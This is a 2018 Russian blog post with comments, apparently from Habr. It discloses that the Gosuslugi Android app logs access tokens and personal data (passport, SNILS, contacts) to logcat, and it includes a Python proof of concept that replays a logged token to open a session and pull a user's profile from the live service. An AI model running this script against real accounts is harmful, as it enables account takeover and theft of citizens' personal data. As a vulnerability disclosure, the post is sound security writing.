Всем доброго времени суток. Все ведь помнят недавний «хайп» вокруг приложения BurgerKing, якобы оно сливает платёжные данные пользователей? Так вот, в этой статье я бы хотел рассказать о гораздо долее масштабном сливе, и не куда-то на 1 сервер а практически всем! За подробностями прошу под кат
С чего всё началось?
А началось всё с баг-репорта по поводу краха мобильного приложения Тинькофф, Я записывал лог падения, чтобы отправить данные разработчикам, а после решил посмотреть логи и других приложений, имеющихся на моём телефоне. Под руку попалось приложение Госуслуги.
Подключаемся через adb к консоли телефона, предварительно включив опцию "Отладка по USB" и запускаем консольную команду logcat.
P.S. Данные указанные в запросах намеренно изменены, все совпадения с реальными людьми чистая случайность.
Далее запускаем приложение Госуслуги и наблюдаем следующую картину:
BaseRequestUri: https://www.gosuslugi.ru/api/cms/v1/disclaimers/mobile
Method: POST, RequestUri: '', Version: 1.1, Content: <null>, Headers:
08-17 14:26:23.863 18730 18730 I mono-stdout: {
08-17 14:26:23.863 18730 18730 I mono-stdout: X-MobileSessionId: 9ae8705c-5140-4630-9087-c1f09843e1a6
08-17 14:26:23.863 18730 18730 I mono-stdout: mobVersion: android_3.3.2.135
08-17 14:26:23.863 18730 18730 I mono-stdout: Cache-Control: no-store, no-cache, max-age=0
08-17 14:26:23.863 18730 18730 I mono-stdout: Pragma: max-age=0, no-cache, no-store
08-17 14:26:23.863 18730 18730 I mono-stdout: Accept: application/json, text/json, text/x-json, text/javascript, application/xml, text/xml, application/zip
08-17 14:26:23.863 18730 18730 I mono-stdout: }
Content-Type: application/json; charset=utf-8
08-17 14:26:23.863 18730 18730 I mono-stdout: Content-Length: 88
RequestBody: {"mnemonics":[{"mnemonic":"SMU_COMMON"}],"userAgent":"android","appVersion":"3.3.2.135"}
В логе полностью отобразился запрос, отправляемый на сервер. Ну, думаю, бывает, забыли убрать при отладке, с кем не бывает. Смотрим дальше и видим ответ:
Response: 6:29.389 18730 18730 I GuRequestLog:
Uri=https://www.gosuslugi.ru/api/cms/v1/disclaimers/mobile
Content-Type=application/json0 I GuRequestLog:
Status-Code=OK.389 18730 18730 I GuRequestLog:
ResponseBody: []89 18730 18730 I GuRequestLog:
Так, а вот это уже странно! Теперь попробуем ввести код доступа в приложение, и тут нас уже ждёт более интересный результат. Сначала видно как происходит отправка запроса на создание сессии:
BaseRequestUri: https://www.gosuslugi.ru/auth-provider/mobile/v2/createSession
Method: POST, RequestUri: '', Version: 1.1, Content: <null>, Headers:
08-17 14:28:34.609 18730 18730 I GuRequestLog: {
08-17 14:28:34.609 18730 18730 I GuRequestLog: X-MobileSessionId: 9ae8705c-5140-4630-9087-c1f09843e1a6
08-17 14:28:34.609 18730 18730 I GuRequestLog: mobVersion: android_3.3.2.135
08-17 14:28:34.609 18730 18730 I GuRequestLog: Accept: application/json, text/json, text/x-json, text/javascript, application/xml, text/xml, application/zip
08-17 14:28:34.609 18730 18730 I GuRequestLog: }
Content-Type: application/json; charset=utf-8:
08-17 14:28:34.609 18730 18730 I GuRequestLog: Content-Length: 854
08-17 14:28:34.609 18730 18730 I GuRequestLog:
RequestBody: {"userId":"84**74555","accessToken":"eyJ2ZXIiOjEsInR5cCI6IkpXVCIsInNidCI6ImFjY2VzcyIsImFsZyI6IlJTMjU2In0.eyJuYmYiOjE1MzQ1MDUwMTcsInNjb3BlIjoiaHR0cDpcL1wvZXNpYS5nb3N1c2x1Z2kucnVcL3Vzcl9pbmY_b2lkPTAwMDAwMDAwMCZtb2RlPXciLCJpc3MiOiJodHRwOlwvXC9lc2lhLmdvc3VzbHVnaS5ydVwvIiwidXJuOmVzaWE6c2lkIjoiMDhlM2M2MDMtMmI1NS0wMDAwLTk0OTMtMDAwMDAwMDAwMDBlIiwidXJuOmVzaWE6c2JqX2lkIjowMDAyMDQwMDAsImV4cCI6MTUzMDUwMDYwMCwiaWF0IjoxNTMwNTA1MDAwLCJjbGllbnRfaWQiOiJQR1UifQ.klq1oftr1t1vaxpagbcdedohu11rm1oplipppwwzyylbcxmfd1jnwgokopdbfak-rxyt1bsdefghrj1lgn1pqrsruvwx1p1bcdeoqwe1k1fyopql1tj1uxzza1cdengqij_l11opzrx_uvwx_za1c11fg111kduqo1frxtu1vxyj-acdebohishh1lopqrstfcwy1zybc1wfnxm1_1m11pq-1s1w-x1za1cdbhvdo_klm-zperqtlovj11ybzref_11wk1mnozqfstwrwxy1auc1e1m1ijhlb-lph1sufvwlyzablcqt1hijkomoo1nrt1mmwxyzfjcde-ghijk","id":"da000000f0002400","name":"_umts","type":"Android"}
Сам запрос отправляется несколько раз, дабы получить более актуальные accessToken и как только токен получен:
Response: 8:35.080 18730 18730 I mono-stdout:
Uri=https://www.gosuslugi.ru/auth-provider/mobile/v2/createSession
Content-Type=application/json0 I mono-stdout:
Status-Code=OK.080 18730 18730 I mono-stdout:
ResponseBody: {"sessionId":"e235d56d-63f3-4b48-a9f6-c1c2d86c25d9","accessToken":"eyJ2ZXIiOjEsInR5cCI6IkpXVCIsInNidCI6ImFjY2VzcyIsImFsZyI6IlJTMjU2In0.eyJuYmYiOjIyNDUsInNjb3BlIjoiaHR0cDpcL1wvZXNpYS5nb3N1c2x1Z2kucnVcL3Vzcl9pbmY_b2lkPTAwMDAwMDAwMCZtb2RlPXciLCJpc3MiOiJodHRwOlwvXC9lc2lhLmdvc3VzbHVnaS5ydVwvIiwidXJuOmVzaWE6c2lkIjoiMDhlM2M2MDMtMmI1NS0wMDAwLTk0OTMtMDAwMDAwMDAwMDBlIiwidXJuOmVzaWE6c2JqX2lkIjowMDAyMDQwMDAsImV4cCI6MTUzMDUwMDYwMCwiaWF0IjoxNTMwNTA1MDAwLCJjbGllbnRfaWQiOiJQR1UifQ.klq1oftr1t1vaxpagbcdedohu11rm1oplipppwwzyylbcxmfd1jnwgokopdbfak-rxyt1bsdefghrj1lgn1pqrsruvwx1p1bcdeoqwe1k1fyopql1tj1uxzza1cdengqij_l11opzrx_uvwx_za1c11fg111kduqo1frxtu1vxyj-acdebohishh1lopqrstfcwy1zybc1wfnxm1_1m11pq-1s1w-x1za1cdbhvdo_klm-zperqtlovj11ybzref_11wk1mnozqfstwrwxy1auc1e1m1ijhlb-lph1sufvwlyzablcqt1hijkomoo1nrt1mmwxyzfjcde-ghijk","error":{"errorCode":"0","errorMessage":"operation completed"}}
Происходит запрос данных о текущем пользователе, и снова всё сыпется в логи:
BaseRequestUri: https://esia.gosuslugi.ru/rs/prns/84**74555
Method: GET, RequestUri: '', Version: 1.1, Content: <null>, Headers:
08-17 14:28:35.960 18730 18730 I GuRequestLog: {
08-17 14:28:35.960 18730 18730 I GuRequestLog: X-MobileSessionId: 9ae8705c-5140-4630-9087-c1f09843e1a6
08-17 14:28:35.960 18730 18730 I GuRequestLog: mobVersion: android_3.3.2.135
08-17 14:28:35.960 18730 18730 I GuRequestLog: Cache-Control: no-cache
08-17 14:28:35.960 18730 18730 I GuRequestLog: If-None-Match: *
08-17 14:28:35.960 18730 18730 I GuRequestLog: Accept: application/json, text/json, text/x-json, text/javascript, application/xml, text/xml, application/zip
08-17 14:28:35.960 18730 18730 I GuRequestLog: Authorization: Bearer eyJ2ZXIiOjEsInR5cCI6IkpXVCIsInNidCI6ImFjY2VzcyIsImFsZyI6IlJTMjU2In0.eyJuYmYiOjIyNDUsInNjb3BlIjoiaHR0cDpcL1wvZXNpYS5nb3N1c2x1Z2kucnVcL3Vzcl9pbmY_b2lkPTAwMDAwMDAwMCZtb2RlPXciLCJpc3MiOiJodHRwOlwvXC9lc2lhLmdvc3VzbHVnaS5ydVwvIiwidXJuOmVzaWE6c2lkIjoiMDhlM2M2MDMtMmI1NS0wMDAwLTk0OTMtMDAwMDAwMDAwMDBlIiwidXJuOmVzaWE6c2JqX2lkIjowMDAyMDQwMDAsImV4cCI6MTUzMDUwMDYwMCwiaWF0IjoxNTMwNTA1MDAwLCJjbGllbnRfaWQiOiJQR1UifQ.klq1oftr1t1vaxpagbcdedohu11rm1oplipppwwzyylbcxmfd1jnwgokopdbfak-rxyt1bsdefghrj1lgn1pqrsruvwx1p1bcdeoqwe1k1fyopql1tj1uxzza1cdengqij_l11opzrx_uvwx_za1c11fg111kduqo1frxtu1vxyj-acdebohishh1lopqrstfcwy1zybc1wfnxm1_1m11pq-1s1w-x1za1cdbhvdo_klm-zperqtlovj11ybzref_11wk1mnozqfstwrwxy1auc1e1m1ijhlb-lph1sufvwlyzablcqt1hijkomoo1nrt1mmwxyzfjcde-ghijk
08-17 14:28:35.960 18730 18730 I GuRequestLog: }
Если отмотать лог ещё немного ниже, можно найти там свои персональные данные, в открытом виде.
Вот так выглядит ответ, содержащий основную информацию о пользователе:
Response: 8:36.940 18730 18730 I GuRequestLog:
Uri=https://esia.gosuslugi.ru/rs/prns/84**74555
Content-Type=application/json0 I GuRequestLog:
Status-Code=OK.940 18730 18730 I GuRequestLog:
ResponseBody: {"stateFacts":["EntityRoot"],"firstName":"Павел","lastName":"Пупкин","middleName":"Васильевич","birthDate":"10.10.1910","birthPlace":"пос. госуслуги, в России","gender":"M","trusted":true,"citizenship":"RUS","snils":"000-000-000 00","inn":"999999999999","updatedOn":1220627522,"status":"REGISTERED","verifying":false,"rIdDoc":88888888,"regCtxCfmSte":"PCD","chosenCfmTypes":["RA"],"regType":"OPR","containsUpCfmCode":false,"eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
А тут у нас ответ на запрос контактных данных:
Uri=https://esia.gosuslugi.ru/rs/prns/84**74555/ctts
Content-Type=application/json0 I GuRequestLog:
Status-Code=OK.776 18730 18730 I GuRequestLog:
ResponseBody: {"stateFacts":["hasSize"],"size":2,"eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA","elements":[{"stateFacts":["Identifiable"],"id":88888888,"type":"EML","vrfStu":"VERIFIED","value":"pupkin_pavel@pochta.ru","eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},{"stateFacts":["Identifiable"],"id":88888888,"type":"MBT","vrfStu":"VERIFIED","value":"+7(955)5555555","eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}]}
Далее приложение запрашивает с сервера паспортные данные, и благополучно печатает это в лог:
Response: 8:39.520 18730 18730 I GuRequestLog:
Uri=https://esia.gosuslugi.ru/rs/prns/84**74555/docs
Content-Type=application/json0 I GuRequestLog:
Status-Code=OK.520 18730 18730 I GuRequestLog:
ResponseBody: {"stateFacts":["hasSize"],"size":1,"eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA","elements":[{"stateFacts":["Identifiable"],"id":0000000,"type":"RF_PASSPORT","vrfStu":"VERIFIED","series":"2000","number":"000000","issueDate":"00.00.2000","issueId":"000000","issuedBy":"ОТДЕЛЕНИЕМ УФМС РОССИИ","eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}]}
Ну и так далее. Добавили водительское удостоверение, чтобы получать уведомления о штрафах? Пожалуйста, мы выведем в лог на всеобщее обозрение и эту информацию.
Ниже вы можете увидеть PoC, который при нужных параметрах создаёт сессию и возвращает некоторую информацию о пользователе.
#!/usr/bin/python3
import requests
import json
import sys
def createSession(userId, lastToken, rid):
url = 'https://www.gosuslugi.ru/auth-provider/mobile/v2/createSession'
header = {
'X-MobileSessionId': '9ae8705c-5140-4630-9087-c1f09843e1a6',
'mobVersion': 'android_3.3.2.135',
'Accept': 'application/json, text/json, text/x-json, text/javascript, application/xml, text/xml, application/zip',
'Content-Type': 'application/json; charset=utf-8'
}
data = {
"userId": userId,
"accessToken": lastToken,
"id": rid,
"name": "hts",
"type": "Android"
}
resp = requests.post(url, data=json.dumps(data), headers=header)
return resp.json()
def getUserInfo(userId, session):
if session['error']['errorCode'] != '0':
print(session['error']['errorMessage'])
return
url = 'https://esia.gosuslugi.ru/rs/prns/%s' % userId
header = {
'X-MobileSessionId': session['sessionId'],
'mobVersion': 'android_3.3.2.135',
'Cache-Control': 'no-cache',
'If-None-Match': '*',
'Accept': 'application/json, text/json, text/x-json, text/javascript, application/xml, text/xml, application/zip',
'Authorization': 'Bearer %s' % session['accessToken']
}
resp = requests.get(url, headers=header)
if resp.status_code == 200:
print(json.dumps(resp.json(), indent=4))
def main():
uid = sys.argv[1]
lastToken = sys.argv[2]
rid = sys.argv[3]
session = createSession(uid, lastToken, rid)
getUserInfo(uid, session)
if __name__ == '__main__':
main()
Вместо заключения
Повторюсь, в само приложение никто никак не «вторгался» ни реверса, ни распаковки. Всё что нужно сделать, чтобы получить эту информацию — это запустить утилиту logcat. На момент написания статьи в Play Market не было более новой версии. Данный результат был получен на Android 6.0.1.
P.S. Как оказалось, действительно этот лог доступен только через ADB и непосредственно самому приложению. Но всё равно как мне кажется это не повод выводить туда критическую информацию.
Так что можно не переживать, если конечно у вас на телефоне не активирован root-доступ.
И напоследок! Уж сколько раз твердили миру, чтобы не путали Debug с Release.
Комментарии (9)
AChep
17.08.2018 15:50+4Но самое интересное, что любому приложению, которое у вас запущено на телефоне, достаточно считать только ваш токен, который отправляется при создании сессии, и всё, в любо момент можно повторить указанные ранее запросы и получить всю информацию о вас. И никаких уведомлений, о том, что в ваш личный кабинет был совершён вход, вы не увидите.
Любому приложению с предоставлеными root-правами, т.к. прочитать логи без них нельзя. С версии, примерно, Android 4.1.
А у приложения с root-правами и так достаточно способов мониторить трафик.mopsicus
17.08.2018 16:16Это понятно, но не сильно успокаивает :) Всё равно ж косяк разработчиков, такое нельзя в лог выводить.
AChep
17.08.2018 16:26Нельзя, но из обычных вариантов использования данные могут утечь через ADB + зараженный компьютер или если вы сами свои логи записали (например падение в логах какого-то приложения) и кому-то отправили забыв стереть лишнее.
Ну или если есть поддержка 4.0.х или ниже.CheY
17.08.2018 16:31+2Поддержки нет, minSdk 16. Вектор атаки через настроенный adb + разрешённую связь с пк + вирус на компьютере крайне нереалистичен. Примерно на уровне «если у пользователя рутованное устройство».
Поэтому нет, к сожалению (или счастью), на серьёзную уязвимость и утечку не тянет. Просто недосмотр разработчиков. Потенциально можно вниматеьно изучить их АПИ благодаря этому и может выцепить проблему с ограничениями прав… Например, прогнать какой-нибудь ID-шник. Но это можно сделать и без логов.
OKyJIucT
17.08.2018 16:21+4Тю, я думал, тут уже всю базу госуслуг выкачали («ссылка на архив в конце статьи»), понадеялся на очередное разоблачение :(
А на деле, чтобы воспользоваться этой «уязвимостью», необходимо не только иметь на удаленном устройстве юзера, инфу которого мы хотим получить, приложение госуслуг, но и подконтрольное нам приложение для чтения логов. И, как выше уже сообщили, предоставить последнему root-права.
Кажется мне, что люди, которые знают, что такое root и как его получить, вряд ли будут бездумно какому попало приложению предоставлять такой доступ.
Vsevo10d
17.08.2018 17:03+1Все ведь помнят недавний «хайп» вокруг приложения BurgerKing, якобы оно сливает платёжные данные пользователей?
А теперь я раздую такой же с госуслугами! Фффффффф ффффффффф фффффффффффф фффффф
cruzo
А сообщить в ГосУслуги перед публикацией? Простые смертные же могут пострадать.